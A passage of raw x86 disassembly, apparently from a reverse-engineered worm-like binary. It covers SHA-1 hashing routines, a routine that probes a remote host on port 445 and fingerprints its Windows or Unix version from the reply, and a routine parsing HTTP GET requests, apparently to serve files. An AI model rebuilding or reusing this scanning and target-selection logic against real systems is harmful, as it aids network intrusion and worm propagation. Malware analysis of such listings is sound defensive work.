mov edi, [ebp+var_10]
mov [ebp+var_8], ecx
mov ecx, edi
shl ecx, 1Eh
shr edi, 2
or ecx, edi
mov edi, [ebp+var_20]
xor edi, [ebp+var_28]
mov [ebp+var_10], ecx
xor edi, [ebp+var_34]
xor edi, [ebp+var_48]
mov ebx, edi
shr ebx, 1Fh
add edi, edi
or ebx, edi
mov edi, ecx
and ecx, [ebp+var_C]
or edi, [ebp+var_C]
mov [ebp+var_28], ebx
and edi, [ebp+arg_0]
mov ebx, [ebp+var_8]
or edi, ecx
add edi, [ebp+var_28]
mov ecx, [ebp+var_8]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, edi
mov edi, [ebp+var_4]
lea ecx, [edi+ecx-70E44324h]
mov [ebp+var_4], ecx
mov ecx, [ebp+var_C]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, esi
xor ecx, [ebp+var_24]
mov [ebp+var_C], edi
xor ecx, [ebp+var_30]
xor ecx, [ebp+var_44]
mov ebx, ecx
add ecx, ecx
shr ebx, 1Fh
or ebx, ecx
mov ecx, [ebp+var_4]
mov [ebp+var_24], ebx
mov ebx, [ebp+var_4]
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_24]
mov ebx, [ebp+var_10]
xor ebx, edi
xor ebx, [ebp+var_8]
add ebx, ecx
mov ecx, [ebp+arg_0]
lea ecx, [ecx+ebx-359D3E2Ah]
mov [ebp+arg_0], ecx
mov ecx, [ebp+var_8]
mov edi, ecx
shr ecx, 2
shl edi, 1Eh
or edi, ecx
mov ecx, eax
xor ecx, [ebp+var_20]
mov [ebp+var_8], edi
xor ecx, [ebp+var_2C]
xor ecx, [ebp+var_40]
mov ebx, ecx
shr ebx, 1Fh
add ecx, ecx
or ebx, ecx
mov ecx, [ebp+arg_0]
mov [ebp+var_20], ebx
mov ebx, [ebp+arg_0]
shl ebx, 5
shr ecx, 1Bh
or ecx, ebx
mov ebx, [ebp+var_C]
xor ebx, edi
xor ebx, [ebp+var_4]
add ecx, [ebp+var_20]
xor esi, [ebp+var_28]
xor eax, [ebp+var_24]
xor esi, [ebp+var_3C]
xor eax, [ebp+var_38]
xor esi, [ebp+var_54]
xor eax, [ebp+var_50]
add ebx, ecx
mov ecx, [ebp+var_10]
lea ebx, [ecx+ebx-359D3E2Ah]
mov ecx, [ebp+var_4]
mov edi, ecx
shl edi, 1Eh
mov [ebp+var_10], ebx
shr ecx, 2
or edi, ecx
mov ecx, esi
mov [ebp+var_4], edi
mov edi, [ebp+arg_0]
xor edi, [ebp+var_8]
add esi, esi
xor edi, [ebp+var_4]
shr ecx, 1Fh
or ecx, esi
mov esi, ebx
shl ebx, 5
shr esi, 1Bh
or esi, ebx
add esi, ecx
add edi, esi
mov esi, [ebp+var_C]
lea ebx, [esi+edi-359D3E2Ah]
mov esi, [ebp+arg_0]
mov edi, esi
shl edi, 1Eh
shr esi, 2
or edi, esi
mov esi, eax
add eax, eax
mov [ebp+var_C], ebx
mov [ebp+arg_0], edi
xor edi, [ebp+var_10]
shr esi, 1Fh
xor edi, [ebp+var_4]
or esi, eax
mov eax, ebx
shr eax, 1Bh
shl ebx, 5
or eax, ebx
add eax, esi
add edi, eax
mov eax, [ebp+var_8]
lea eax, [eax+edi-359D3E2Ah]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, [ebp+var_20]
xor eax, [ebp+var_34]
mov [ebp+var_10], edi
xor eax, [ebp+var_4C]
xor eax, [ebp+var_54]
mov ebx, eax
add eax, eax
shr ebx, 1Fh
or ebx, eax
mov eax, [ebp+var_8]
mov [ebp+var_54], ebx
mov ebx, [ebp+var_8]
shr eax, 1Bh
shl ebx, 5
or eax, ebx
mov ebx, [ebp+arg_0]
add eax, [ebp+var_54]
xor ebx, edi
xor ebx, [ebp+var_C]
add ebx, eax
mov eax, [ebp+var_4]
lea eax, [eax+ebx-359D3E2Ah]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, ecx
xor eax, [ebp+var_30]
mov [ebp+var_C], edi
xor eax, [ebp+var_48]
xor eax, [ebp+var_50]
mov ebx, eax
add eax, eax
shr ebx, 1Fh
or ebx, eax
mov eax, [ebp+var_4]
shr eax, 1Bh
mov [ebp+var_50], ebx
mov ebx, [ebp+var_4]
shl ebx, 5
or eax, ebx
add eax, [ebp+var_50]
mov ebx, [ebp+var_10]
xor ebx, edi
xor ebx, [ebp+var_8]
add ebx, eax
mov eax, [ebp+arg_0]
lea eax, [eax+ebx-359D3E2Ah]
mov [ebp+arg_0], eax
mov eax, [ebp+var_8]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, esi
xor eax, [ebp+var_2C]
mov [ebp+var_8], edi
xor eax, [ebp+var_44]
xor eax, [ebp+var_4C]
mov ebx, eax
add eax, eax
shr ebx, 1Fh
or ebx, eax
mov eax, [ebp+arg_0]
shr eax, 1Bh
mov [ebp+var_4C], ebx
mov ebx, [ebp+arg_0]
shl ebx, 5
or eax, ebx
add eax, [ebp+var_4C]
mov ebx, [ebp+var_C]
xor ebx, edi
xor ebx, [ebp+var_4]
add ebx, eax
mov eax, [ebp+var_10]
lea ebx, [eax+ebx-359D3E2Ah]
mov eax, [ebp+var_4]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, [ebp+var_28]
xor eax, [ebp+var_40]
mov [ebp+var_4], edi
xor eax, [ebp+var_48]
mov [ebp+var_10], ebx
xor eax, [ebp+var_54]
mov edi, eax
add eax, eax
shr edi, 1Fh
or edi, eax
mov [ebp+var_48], edi
mov edi, [ebp+arg_0]
xor edi, [ebp+var_8]
mov eax, ebx
xor edi, [ebp+var_4]
shr eax, 1Bh
shl ebx, 5
or eax, ebx
add eax, [ebp+var_48]
add edi, eax
mov eax, [ebp+var_C]
lea eax, [eax+edi-359D3E2Ah]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, [ebp+var_24]
xor eax, [ebp+var_3C]
mov [ebp+arg_0], edi
xor eax, [ebp+var_44]
xor edi, [ebp+var_10]
xor eax, [ebp+var_50]
xor edi, [ebp+var_4]
mov ebx, eax
add eax, eax
shr ebx, 1Fh
or ebx, eax
mov eax, [ebp+var_C]
shr eax, 1Bh
mov [ebp+var_44], ebx
mov ebx, [ebp+var_C]
shl ebx, 5
or eax, ebx
add eax, [ebp+var_44]
add edi, eax
mov eax, [ebp+var_8]
lea eax, [eax+edi-359D3E2Ah]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, [ebp+var_20]
xor eax, [ebp+var_38]
mov [ebp+var_10], edi
xor eax, [ebp+var_40]
xor eax, [ebp+var_4C]
mov ebx, eax
add eax, eax
shr ebx, 1Fh
or ebx, eax
mov eax, [ebp+var_8]
mov [ebp+var_40], ebx
mov ebx, [ebp+var_8]
shr eax, 1Bh
shl ebx, 5
or eax, ebx
add eax, [ebp+var_40]
mov ebx, [ebp+arg_0]
xor ebx, edi
xor ebx, [ebp+var_C]
add ebx, eax
mov eax, [ebp+var_4]
lea eax, [eax+ebx-359D3E2Ah]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, ecx
xor eax, [ebp+var_34]
mov [ebp+var_C], edi
xor eax, [ebp+var_3C]
xor eax, [ebp+var_48]
mov ebx, eax
shr ebx, 1Fh
add eax, eax
or ebx, eax
mov eax, [ebp+var_4]
mov [ebp+var_3C], ebx
mov ebx, [ebp+var_4]
shl ebx, 5
shr eax, 1Bh
or eax, ebx
mov ebx, [ebp+var_10]
xor ebx, edi
xor ebx, [ebp+var_8]
add eax, [ebp+var_3C]
add ebx, eax
mov eax, [ebp+arg_0]
lea eax, [eax+ebx-359D3E2Ah]
mov [ebp+arg_0], eax
mov eax, [ebp+var_8]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, esi
xor eax, [ebp+var_30]
mov [ebp+var_8], edi
xor eax, [ebp+var_38]
xor eax, [ebp+var_44]
mov ebx, eax
add eax, eax
shr ebx, 1Fh
or ebx, eax
mov eax, [ebp+arg_0]
shr eax, 1Bh
mov [ebp+var_38], ebx
mov ebx, [ebp+arg_0]
shl ebx, 5
or eax, ebx
add eax, [ebp+var_38]
mov ebx, [ebp+var_C]
xor ebx, edi
xor ebx, [ebp+var_4]
add ebx, eax
mov eax, [ebp+var_10]
lea ebx, [eax+ebx-359D3E2Ah]
mov eax, [ebp+var_4]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, [ebp+var_2C]
xor eax, [ebp+var_34]
mov [ebp+var_4], edi
xor eax, [ebp+var_40]
mov [ebp+var_10], ebx
xor eax, [ebp+var_54]
mov edi, eax
add eax, eax
shr edi, 1Fh
or edi, eax
mov [ebp+var_34], edi
mov edi, [ebp+arg_0]
xor edi, [ebp+var_8]
mov eax, ebx
xor edi, [ebp+var_4]
shr eax, 1Bh
shl ebx, 5
or eax, ebx
add eax, [ebp+var_34]
add edi, eax
mov eax, [ebp+var_C]
lea eax, [eax+edi-359D3E2Ah]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, [ebp+var_28]
xor eax, [ebp+var_30]
mov [ebp+arg_0], edi
xor eax, [ebp+var_3C]
xor edi, [ebp+var_10]
xor eax, [ebp+var_50]
mov ebx, eax
add eax, eax
shr ebx, 1Fh
or ebx, eax
mov eax, [ebp+var_C]
mov [ebp+var_30], ebx
mov ebx, [ebp+var_C]
shr eax, 1Bh
shl ebx, 5
or eax, ebx
xor edi, [ebp+var_4]
add eax, [ebp+var_30]
add edi, eax
mov eax, [ebp+var_8]
lea eax, [eax+edi-359D3E2Ah]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, [ebp+var_24]
xor eax, [ebp+var_2C]
mov [ebp+var_10], edi
xor eax, [ebp+var_38]
xor eax, [ebp+var_4C]
mov ebx, eax
add eax, eax
shr ebx, 1Fh
or ebx, eax
mov eax, [ebp+var_8]
shr eax, 1Bh
mov [ebp+var_2C], ebx
mov ebx, [ebp+var_8]
shl ebx, 5
or eax, ebx
add eax, [ebp+var_2C]
mov ebx, [ebp+arg_0]
xor ebx, edi
xor ebx, [ebp+var_C]
add ebx, eax
mov eax, [ebp+var_4]
lea eax, [eax+ebx-359D3E2Ah]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, [ebp+var_20]
xor eax, [ebp+var_28]
mov [ebp+var_C], edi
xor eax, [ebp+var_34]
xor eax, [ebp+var_48]
mov ebx, eax
add eax, eax
shr ebx, 1Fh
or ebx, eax
mov eax, [ebp+var_4]
mov [ebp+var_28], ebx
mov ebx, [ebp+var_4]
shr eax, 1Bh
shl ebx, 5
or eax, ebx
add eax, [ebp+var_28]
mov ebx, [ebp+var_10]
xor ebx, edi
xor ebx, [ebp+var_8]
add ebx, eax
mov eax, [ebp+arg_0]
lea eax, [eax+ebx-359D3E2Ah]
mov [ebp+arg_0], eax
mov eax, [ebp+var_8]
mov edi, eax
shr eax, 2
shl edi, 1Eh
or edi, eax
mov eax, ecx
xor eax, [ebp+var_24]
mov [ebp+var_8], edi
xor eax, [ebp+var_30]
xor eax, [ebp+var_44]
mov ebx, eax
shr ebx, 1Fh
add eax, eax
or ebx, eax
mov eax, [ebp+arg_0]
mov [ebp+var_24], ebx
mov ebx, [ebp+arg_0]
shr eax, 1Bh
shl ebx, 5
or eax, ebx
add eax, [ebp+var_24]
mov ebx, [ebp+var_C]
xor ebx, edi
xor ebx, [ebp+var_4]
xor ecx, [ebp+var_28]
add ebx, eax
mov eax, [ebp+var_10]
lea ebx, [eax+ebx-359D3E2Ah]
mov eax, [ebp+var_4]
mov edi, eax
shl edi, 1Eh
shr eax, 2
or edi, eax
xor ecx, [ebp+var_3C]
mov [ebp+var_4], edi
xor ecx, [ebp+var_54]
mov eax, esi
xor eax, [ebp+var_20]
mov [ebp+var_10], ebx
xor eax, [ebp+var_2C]
xor esi, [ebp+var_24]
xor eax, [ebp+var_40]
xor esi, [ebp+var_38]
mov edi, eax
shr edi, 1Fh
add eax, eax
or edi, eax
mov [ebp+var_20], edi
mov edi, [ebp+arg_0]
xor edi, [ebp+var_8]
mov eax, ebx
xor edi, [ebp+var_4]
shl ebx, 5
shr eax, 1Bh
or eax, ebx
add eax, [ebp+var_20]
mov ebx, [ebp+arg_0]
add edi, eax
mov eax, [ebp+var_C]
lea eax, [eax+edi-359D3E2Ah]
xor esi, [ebp+var_50]
mov edi, ebx
shl edi, 1Eh
shr ebx, 2
or edi, ebx
mov ebx, ecx
add ecx, ecx
mov [ebp+arg_0], edi
xor edi, [ebp+var_10]
shr ebx, 1Fh
xor edi, [ebp+var_4]
or ebx, ecx
mov [ebp+var_1C], ebx
mov ecx, eax
shr ecx, 1Bh
mov ebx, eax
shl ebx, 5
or ecx, ebx
add ecx, [ebp+var_1C]
add edi, ecx
mov ecx, [ebp+var_8]
lea ebx, [ecx+edi-359D3E2Ah]
mov edi, [ebp+var_10]
mov ecx, edi
shr edi, 2
shl ecx, 1Eh
or ecx, edi
mov edi, esi
shr edi, 1Fh
add esi, esi
or edi, esi
mov [ebp+var_18], edi
mov esi, ebx
mov edi, ebx
shl edi, 5
shr esi, 1Bh
or esi, edi
mov edi, [ebp+arg_0]
xor edi, ecx
xor edi, eax
add esi, [ebp+var_18]
add edi, esi
mov esi, [ebp+var_4]
lea edi, [esi+edi-359D3E2Ah]
mov esi, [edx]
add esi, edi
mov [edx], esi
mov esi, [edx+4]
add esi, ebx
mov [edx+4], esi
mov esi, eax
shr eax, 2
shl esi, 1Eh
or esi, eax
mov eax, [edx+0Ch]
add esi, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_0]
mov [edx+0Ch], eax
mov eax, [edx+10h]
pop edi
mov [edx+8], esi
add eax, ecx
pop esi
mov [edx+10h], eax
pop ebx
leave
retn
sub_9A9F13 endp
; =============== S U B R O U T I N E =======================================
sub_9AB937 proc near ; CODE XREF: sub_9A9BA7+A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword ptr [eax+18h], 0
and dword ptr [eax+14h], 0
mov dword ptr [eax], 67452301h
mov dword ptr [eax+4], 0EFCDAB89h
mov dword ptr [eax+8], 98BADCFEh
mov dword ptr [eax+0Ch], 10325476h
mov dword ptr [eax+10h], 0C3D2E1F0h
retn
sub_9AB937 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB966 proc near ; CODE XREF: sub_9A9BA7+19�p
; sub_9ABA09+38�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push esi
mov esi, [ebp+arg_0]
mov ecx, [esi+14h]
mov eax, ecx
shr eax, 3
mov edx, ebx
lea ecx, [ecx+ebx*8]
shl edx, 3
and eax, 3Fh
cmp ecx, edx
push edi
mov [esi+14h], ecx
jnb short loc_9AB98F
inc dword ptr [esi+18h]
loc_9AB98F: ; CODE XREF: sub_9AB966+24�j
mov ecx, ebx
shr ecx, 1Dh
add [esi+18h], ecx
lea ecx, [eax+ebx]
cmp ecx, 3Fh
jbe short loc_9AB9EC
push 40h
pop edi
sub edi, eax
push edi
push [ebp+arg_4]
lea eax, [eax+esi+1Ch]
push eax
call sub_9B323A ; memcpy
lea eax, [esi+1Ch]
push eax
push esi
call sub_9A9F13
lea eax, [edi+3Fh]
add esp, 14h
cmp eax, ebx
jnb short loc_9AB9E8
mov [ebp+arg_0], eax
loc_9AB9C9: ; CODE XREF: sub_9AB966+80�j
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_4]
lea eax, [eax+ecx-3Fh]
push eax
push esi
call sub_9A9F13
add [ebp+arg_0], 40h
pop ecx
add edi, 40h
cmp [ebp+arg_0], ebx
pop ecx
jb short loc_9AB9C9
loc_9AB9E8: ; CODE XREF: sub_9AB966+5E�j
xor eax, eax
jmp short loc_9AB9EE
; ---------------------------------------------------------------------------
loc_9AB9EC: ; CODE XREF: sub_9AB966+37�j
xor edi, edi
loc_9AB9EE: ; CODE XREF: sub_9AB966+84�j
mov ecx, [ebp+arg_4]
sub ebx, edi
push ebx
add edi, ecx
lea eax, [eax+esi+1Ch]
push edi
push eax
call sub_9B323A ; memcpy
add esp, 0Ch
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9AB966 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ABA09 proc near ; CODE XREF: sub_9A9BA7+25�p
var_9 = byte ptr -9
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
xor eax, eax
loc_9ABA16: ; CODE XREF: sub_9ABA09+2E�j
push 3
mov edx, eax
pop ecx
and edx, ecx
sub ecx, edx
shl ecx, 3
cmp eax, 4
sbb edx, edx
neg edx
mov edx, [esi+edx*4+14h]
shr edx, cl
inc eax
cmp eax, 8
mov [ebp+eax+var_9], dl
jb short loc_9ABA16
push 1
push offset aA ; ""
push esi
call sub_9AB966
lea edi, [esi+14h]
mov ebx, 1C0h
jmp short loc_9ABA5D
; ---------------------------------------------------------------------------
loc_9ABA50: ; CODE XREF: sub_9ABA09+60�j
push 1
push offset dword_9A19B4
push esi
call sub_9AB966
loc_9ABA5D: ; CODE XREF: sub_9ABA09+45�j
mov eax, [edi]
and eax, 1F8h
add esp, 0Ch
cmp eax, ebx
jnz short loc_9ABA50
push 8
lea eax, [ebp+var_8]
push eax
push esi
call sub_9AB966
add esp, 0Ch
xor eax, eax
loc_9ABA7C: ; CODE XREF: sub_9ABA09+93�j
push 3
mov edx, eax
pop ecx
and edx, ecx
sub ecx, edx
mov edx, eax
shr edx, 2
mov edx, [esi+edx*4]
shl ecx, 3
shr edx, cl
mov ecx, [ebp+arg_0]
mov [eax+ecx], dl
inc eax
cmp eax, 14h
jb short loc_9ABA7C
push 40h
lea ebx, [esi+1Ch]
push 0
push ebx
call sub_9B3240 ; memset
push 14h
push 0
push esi
call sub_9B3240 ; memset
push 8
push 0
push edi
call sub_9B3240 ; memset
push 8
lea eax, [ebp+var_8]
push 0
push eax
call sub_9B3240 ; memset
push ebx
push esi
call sub_9A9F13
add esp, 38h
pop edi
pop esi
pop ebx
leave
retn
sub_9ABA09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ABADB proc near ; CODE XREF: sub_9A7887+9�p
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 1Ch
push offset stru_9A1B08
call __SEH_prolog
or ebx, 0FFFFFFFFh
mov [ebp+var_1C], ebx
mov [ebp+var_2C], ebx
xor edi, edi
mov [ebp+var_20], edi
mov [ebp+ms_exc.disabled], edi
push 6
push 1
push 2
call dword_9A12AC ; socket
mov esi, eax
mov [ebp+var_2C], esi
cmp esi, 0FFFFFFFFh
jz loc_9ABD3E
push 4
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_9A8385
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_9ABD3E
cmp word ptr [ebp+arg_4], 1BDh
jz short loc_9ABB7C
push 7
push 48h
push offset aB ; ""
push esi
call sub_9A82E1
add esp, 10h
cmp eax, 48h
jnz loc_9ABD3E
push 7
lea eax, [ebp+var_24]
push eax
push esi
call sub_9A8214
add esp, 0Ch
mov [ebp+var_20], eax
cmp eax, edi
jz loc_9ABD3E
cmp [ebp+var_24], edi
jz loc_9ABD3E
push eax
call dword_9A10BC ; GlobalFree
mov [ebp+var_20], edi
loc_9ABB7C: ; CODE XREF: sub_9ABADB+57�j
push 7
pop edi
push edi
push 33h
push offset dword_9A1A0C
push esi
call sub_9A82E1
add esp, 10h
cmp eax, 33h
jnz loc_9ABD3E
push edi
lea eax, [ebp+var_24]
push eax
push esi
call sub_9A8214
add esp, 0Ch
mov [ebp+var_20], eax
test eax, eax
jz loc_9ABD3E
cmp [ebp+var_24], 0
jz loc_9ABD3E
push eax
call dword_9A10BC ; GlobalFree
and [ebp+var_20], 0
push edi
push 4Dh
push offset dword_9A1A40
push esi
call sub_9A82E1
add esp, 10h
cmp eax, 4Dh
jnz loc_9ABD3E
push edi
lea eax, [ebp+var_24]
push eax
push esi
call sub_9A8214
add esp, 0Ch
mov [ebp+var_20], eax
test eax, eax
jz loc_9ABD3E
mov eax, [ebp+var_24]
test eax, eax
jz loc_9ABD01
loc_9ABC05: ; CODE XREF: sub_9ABADB+13E�j
dec eax
mov [ebp+var_28], eax
mov ecx, [ebp+var_20]
test eax, eax
jz loc_9ABD3E
cmp byte ptr [eax+ecx-1], 0
jnz short loc_9ABC05
test eax, eax
jz loc_9ABD3E
loc_9ABC23: ; CODE XREF: sub_9ABADB+159�j
dec eax
mov [ebp+var_28], eax
test eax, eax
jz loc_9ABD3E
cmp byte ptr [eax+ecx-1], 0
jnz short loc_9ABC23
test eax, eax
jz loc_9ABD3E
loc_9ABC3E: ; CODE XREF: sub_9ABADB+174�j
dec eax
mov [ebp+var_28], eax
test eax, eax
jz loc_9ABD3E
cmp byte ptr [eax+ecx-1], 0
jnz short loc_9ABC3E
test eax, eax
jz loc_9ABD3E
lea edi, [eax+ecx]
push edi
call dword_9A11C0 ; _strlwr
mov [esp+3Ch+var_3C], offset aVista ; "vista"
push edi
mov esi, dword_9A11C4
call esi ; dword_9A11C4
pop ecx
pop ecx
test eax, eax
jz short loc_9ABCA9
push offset aServicePack1 ; "service pack 1"
push edi
call esi ; dword_9A11C4
pop ecx
pop ecx
test eax, eax
jz short loc_9ABC8E
push 9
jmp loc_9ABD3A
; ---------------------------------------------------------------------------
loc_9ABC8E: ; CODE XREF: sub_9ABADB+1AA�j
push offset aServicePack ; "service pack"
push edi
call esi ; dword_9A11C4
pop ecx
pop ecx
mov ebx, eax
neg ebx
sbb ebx, ebx
and ebx, 2
add ebx, 8
jmp loc_9ABD3B
; ---------------------------------------------------------------------------
loc_9ABCA9: ; CODE XREF: sub_9ABADB+19C�j
push offset aWindowsServer2 ; "windows server 2003"
push edi
call esi ; dword_9A11C4
pop ecx
pop ecx
test eax, eax
jz short loc_9ABCF3
push offset aServicePack1 ; "service pack 1"
push edi
call esi ; dword_9A11C4
pop ecx
pop ecx
test eax, eax
jz short loc_9ABCC9
push 5
jmp short loc_9ABD3A
; ---------------------------------------------------------------------------
loc_9ABCC9: ; CODE XREF: sub_9ABADB+1E8�j
push offset aServicePack2 ; "service pack 2"
push edi
call esi ; dword_9A11C4
pop ecx
pop ecx
test eax, eax
jz short loc_9ABCDB
push 6
jmp short loc_9ABD3A
; ---------------------------------------------------------------------------
loc_9ABCDB: ; CODE XREF: sub_9ABADB+1FA�j
push offset aServicePack ; "service pack"
push edi
call esi ; dword_9A11C4
pop ecx
pop ecx
mov ebx, eax
neg ebx
sbb ebx, ebx
and ebx, 3
add ebx, 4
jmp short loc_9ABD3B
; ---------------------------------------------------------------------------
loc_9ABCF3: ; CODE XREF: sub_9ABADB+1DA�j
push offset aWindows5_1 ; "windows 5.1"
push edi
call esi ; dword_9A11C4
pop ecx
pop ecx
test eax, eax
jz short loc_9ABD05
loc_9ABD01: ; CODE XREF: sub_9ABADB+124�j
push 3
jmp short loc_9ABD3A
; ---------------------------------------------------------------------------
loc_9ABD05: ; CODE XREF: sub_9ABADB+224�j
push offset aWindows5_0 ; "windows 5.0"
push edi
call esi ; dword_9A11C4
pop ecx
pop ecx
test eax, eax
jz short loc_9ABD17
push 2
jmp short loc_9ABD3A
; ---------------------------------------------------------------------------
loc_9ABD17: ; CODE XREF: sub_9ABADB+236�j
push offset aWindows4_0 ; "windows 4.0"
push edi
call esi ; dword_9A11C4
pop ecx
pop ecx
test eax, eax
jz short loc_9ABD2A
xor ebx, ebx
inc ebx
jmp short loc_9ABD3B
; ---------------------------------------------------------------------------
loc_9ABD2A: ; CODE XREF: sub_9ABADB+248�j
push offset aUnix ; "unix"
push edi
call esi ; dword_9A11C4
pop ecx
pop ecx
test eax, eax
jz short loc_9ABD3E
push 0Bh
loc_9ABD3A: ; CODE XREF: sub_9ABADB+1AE�j
; sub_9ABADB+1EC�j ...
pop ebx
loc_9ABD3B: ; CODE XREF: sub_9ABADB+1C9�j
; sub_9ABADB+216�j ...
mov [ebp+var_1C], ebx
loc_9ABD3E: ; CODE XREF: sub_9ABADB+31�j
; sub_9ABADB+4B�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9ABD52
; ---------------------------------------------------------------------------
loc_9ABD44: ; DATA XREF: .text:stru_9A1B08�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9ABD48: ; DATA XREF: .text:stru_9A1B08�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_9ABD52: ; CODE XREF: sub_9ABADB+267�j
cmp [ebp+var_20], 0
jz short loc_9ABD61
push [ebp+var_20]
call dword_9A10BC ; GlobalFree
loc_9ABD61: ; CODE XREF: sub_9ABADB+27B�j
cmp [ebp+var_2C], 0FFFFFFFFh
jz short loc_9ABD7B
push 1
push [ebp+var_2C]
call dword_9A1278 ; shutdown
push [ebp+var_2C]
call dword_9A1284 ; closesocket
loc_9ABD7B: ; CODE XREF: sub_9ABADB+28A�j
mov eax, ebx
call __SEH_epilog
retn
sub_9ABADB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ABD83 proc near ; DATA XREF: sub_9AC1D7+116�o
var_29C = byte ptr -29Ch
var_9D = byte ptr -9Dh
var_9C = byte ptr -9Ch
var_5D = byte ptr -5Dh
var_5C = byte ptr -5Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 28Ch
push offset stru_9A1BA8
call __SEH_prolog
mov eax, [ebp+arg_0]
mov [ebp+var_44], eax
mov esi, [eax]
mov [ebp+var_30], esi
mov eax, [eax+4]
mov [ebp+var_40], eax
xor ebx, ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_20], ebx
mov [ebp+var_24], 10h
mov [ebp+ms_exc.disabled], ebx
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_5C]
push eax
push esi
call dword_9A1274 ; getsockname
cmp eax, 0FFFFFFFFh
jz short loc_9ABDD2
mov eax, [ebp+var_58]
mov [ebp+var_3C], eax
loc_9ABDD2: ; CODE XREF: sub_9ABD83+47�j
push 7
lea eax, [ebp+var_24]
push eax
push esi
call sub_9A8214
add esp, 0Ch
mov edi, eax
mov [ebp+var_38], edi
cmp edi, ebx
jz loc_9AC0B5
push offset dword_9B5614
mov esi, offset aGetSHttp ; "get /%s http/"
push esi
push 200h
lea eax, [ebp+var_29C]
push eax
mov ebx, dword_9A11D4
call ebx ; dword_9A11D4
mov [ebp+var_9D], 0
push offset dword_9B5620
push esi
push 40h
lea eax, [ebp+var_9C]
push eax
call ebx ; dword_9A11D4
add esp, 20h
mov [ebp+var_5D], 0
mov eax, [ebp+var_24]
test eax, eax
jz short loc_9ABE40
mov byte ptr [eax+edi-1], 0
push edi
call dword_9A11C0 ; _strlwr
pop ecx
loc_9ABE40: ; CODE XREF: sub_9ABD83+AE�j
lea eax, [ebp+var_29C]
push eax
call sub_9B322E ; strlen
pop ecx
cmp [ebp+var_24], eax
jle short loc_9ABE7C
lea eax, [ebp+var_29C]
push eax
call sub_9B322E ; strlen
push eax
lea eax, [ebp+var_29C]
push eax
push edi
call sub_9B333C ; memcmp
add esp, 10h
test eax, eax
jnz short loc_9ABE7C
mov [ebp+var_20], 1
jmp short loc_9ABEB6
; ---------------------------------------------------------------------------
loc_9ABE7C: ; CODE XREF: sub_9ABD83+CD�j
; sub_9ABD83+EE�j
lea eax, [ebp+var_9C]
push eax
call sub_9B322E ; strlen
pop ecx
cmp [ebp+var_24], eax
jle short loc_9ABEB6
lea eax, [ebp+var_9C]
push eax
call sub_9B322E ; strlen
push eax
lea eax, [ebp+var_9C]
push eax
push edi
call sub_9B333C ; memcmp
add esp, 10h
test eax, eax
jnz short loc_9ABEB6
mov [ebp+var_20], 2
loc_9ABEB6: ; CODE XREF: sub_9ABD83+F7�j
; sub_9ABD83+109�j ...
cmp [ebp+var_20], 0
jz loc_9AC0B5
and [ebp+var_2C], 0
and [ebp+var_1C], 0
mov [ebp+var_28], 1
cmp [ebp+var_20], 2
jz short loc_9ABF21
push offset asc_9A1B90 ; "\r\n\r\n"
push edi
mov esi, dword_9A11C4
